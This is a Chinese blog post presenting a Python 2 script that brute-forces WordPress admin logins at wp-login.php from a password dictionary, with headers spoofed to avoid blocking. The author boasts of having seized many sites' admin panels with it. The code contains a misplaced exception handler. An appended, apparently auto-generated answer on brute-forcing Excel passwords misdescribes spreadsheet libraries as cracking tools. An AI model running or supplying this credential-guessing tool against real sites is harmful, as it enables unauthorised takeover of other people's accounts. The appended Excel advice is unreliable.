python 破解wp博客后台登陆密码

当时自己架设wp的时候发现默认居然没有验证码,于是写了个小脚本,跑了下。 居然还拿到不少后台。 惊


代码:python 暴力破解wordpress博客后台登陆密码


http://www.30daydo.com/article/8



(上面只是截取了一个本地的)


# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib,sys


class wordpress():
    def __init__(self, host, username):
		#初始化定义 header ,避免被服务器屏蔽
        self.username = username
        self.http="http://"+host
        self.url =  self.http + "/wp-login.php"
        self.redirect = self.http + "/wp-admin/"
        self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
        self.referer=self.http+"/wp-login.php"
        self.cook="wordpress_test_cookie=WP+Cookie+check"
        self.host=host
        self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
        self.cookie = cookielib.CookieJar()
        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))


    def crash(self, filename):
        try:
            pwd = open(filename, 'r')
			#读取密码文件,密码文件中密码越多破解的概率越大
            while 1 :
                i=pwd.readline()
                if not i :
                    break

                data = urllib.urlencode(
                    {"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
                Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
				#构造好数据包之后提交给wordpress网站后台
                Resp = urllib2.urlopen(Req)
                result = Resp.read()
                # print result
                login = re.search(r'login_error', result)
				#判断返回来的字符串,如果有login error说明失败了。
                if login:
                    pass
                else:
                    print "Crashed! password is %s %s" % (self.username,i.strip())
                    g=open("wordpress.txt",'w+')
                    g.write("Crashed! password is %s %s" % (self.username,i.strip()))
                    pwd.close()
                    g.close()
					#如果匹配到密码, 则这次任务完成,退出程序
                    exit()
                    break

            pwd.close()

			except Exception, e:
            print "error"
            print e
            print "Error in reading password"


if __name__ == "__main__":
    print "begin at " + time.ctime()
    host=sys.argv[1]
    #url = "http://"+host
	#给程序提供参数,为你要破解的网址
    user = sys.argv[2]
    dictfile=sys.argv[3]
	#提供你事先准备好的密码文件
    obj = wordpress(host, user)
    #obj.check(dictfile)
    obj.crash(dictfile)
    #obj.crash_v()
    print "end at " + time.ctime()


github: https://github.com/Rockyzsu/zip_crash

求star

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
破解Excel文件的进入密码,可以使用Python编程语言。首先,我们需要了解加密算法。根据引用中的信息,Excel使用AES算法进行加密。接下来,可以采用排列组合的方式进行密码查找。具体步骤如下: 1. 创建一个Python脚本,命名为"crack.py",该脚本将用于破解Excel密码。在脚本中,我们可以使用Python的密码破解库,如"openpyxl"或"xlrd"。 2. 在脚本中,我们需要导入所需的库,并设置密码查找的范围和字符集。可以使用字母、数字和特殊字符来构建密码列表。 3. 使用循环和嵌套循环来生成不同长度的密码组合,并尝试使用这些密码来解密Excel文件。 4. 当找到正确的密码时,可以通过使用密码直接打开Excel文件来验证密码是否正确。 所以,你可以按照上述步骤编写一个Python脚本来破解Excel进入密码。请注意,这种方法需要耐心和时间,因为密码的组合可能非常多。引用给出的参考资料中的具体代码可以帮助你更好地理解和实践这个过程。 希望这个回答对你有所帮助!<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [python破解excel进入密码(密码字典)](https://blog.csdn.net/qq_45365214/article/details/123236357)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [python破解excel进入密码(指定密码字符)](https://blog.csdn.net/qq_45365214/article/details/123275771)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值